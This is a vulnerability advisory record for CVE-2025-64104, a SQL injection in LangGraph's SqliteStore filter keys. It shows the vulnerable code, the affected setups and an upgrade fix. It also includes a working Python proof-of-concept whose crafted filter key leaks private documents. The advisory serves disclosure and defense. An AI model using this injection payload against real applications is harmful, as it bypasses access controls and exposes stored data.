{"id":"CVE-2025-64104","aliases":["GHSA-7p73-8jqx-23r8","PYSEC-2026-1529"],"title":"LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore","summary":"LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore","severity":"high","cvss":7.3,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N","vendor":"langgraph-checkpoint-sqlite","product":"langgraph-checkpoint-sqlite","ecosystem":"pip","affected":["langgraph-checkpoint-sqlite < 2.0.11"],"patched":["langgraph-checkpoint-sqlite 2.0.11"],"published":"2025-10-29","updated":"2026-07-07","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-7p73-8jqx-23r8","references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64104"},{"url":"https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4"},{"url":"https://github.com/langchain-ai/langgraph"}],"tags":["osv","pip"],"epss":0.00176,"epssPercentile":0.07361,"ingestedAt":"2026-07-08T18:25:47.054Z","slug":"CVE-2025-64104","body":"## Overview\n\n### Summary\nLangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.\n\n### Details\n[`/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py`](https://github.com/langchain-ai/langgraph/blob/ee5d052a07aadd76dae123a27009ea0a3694fa0a/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py#L407)\n\nThe key portion of the JSON path is concatenated directly into the SQL string without sanitation. There's a few different occurrences within the file.\n\n```python\n  filter_conditions.append(\n      \"json_extract(value, '$.\"\n      + key  # <-- Directly concatenated, no escaping!\n      + \"') = '\"\n      + value.replace(\"'\", \"''\")  # <-- Only value is escaped\n      + \"'\"\n  )\n```\n\n### Who is affected\n\nThis issue affects **only developers or projects that directly use the `checkpoint-sqlite` store**. \n\nAn application is vulnerable only if it:\n1. Instantiates the `SqliteStore` from the `checkpoint-sqlite` package, **and**\n2. Builds the `filter` argument using keys derived from **untrusted or user-supplied input** (such as query parameters, request bodies, or other external data).\n\nIf filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.\n\nNote: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\n```python\n#!/usr/bin/env python3\n\"\"\"Minimal SQLite Key Injection POC for LangGraph\"\"\"\n\nfrom langgraph.store.sqlite import SqliteStore\n\n# Create store with test data\nwith SqliteStore.from_conn_string(\":memory:\") as store:\n    store.setup()\n    \n    # Add public and private documents\n    store.put((\"docs\",), \"public\", {\"access\": \"public\", \"data\": \"public info\"})\n    store.put((\"docs\",), \"private\", {\"access\": \"private\", \"data\": \"secret\", \"password\": \"123\"})\n    \n    # Normal query - returns 1 public document\n    normal = store.search((\"docs\",), filter={\"access\": \"public\"})\n    print(f\"Normal query: {len(normal)} docs\")\n    \n    # SQL injection via malicious key\n    malicious_key = \"access') = 'public' OR '1'='1' OR json_extract(value, '$.\"\n    injected = store.search((\"docs\",), filter={malicious_key: \"dummy\"})\n    \n    print(f\"Injected query: {len(injected)} docs\")\n    for doc in injected:\n        if doc.value.get(\"access\") == \"private\":\n            print(f\"LEAKED: {doc.value}\")\n```\n\n## Affected packages\n\n- `langgraph-checkpoint-sqlite < 2.0.11`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `langgraph-checkpoint-sqlite 2.0.11`","depth":"twilight","depthScore":40,"depthScoreParts":{"impact":40.2,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}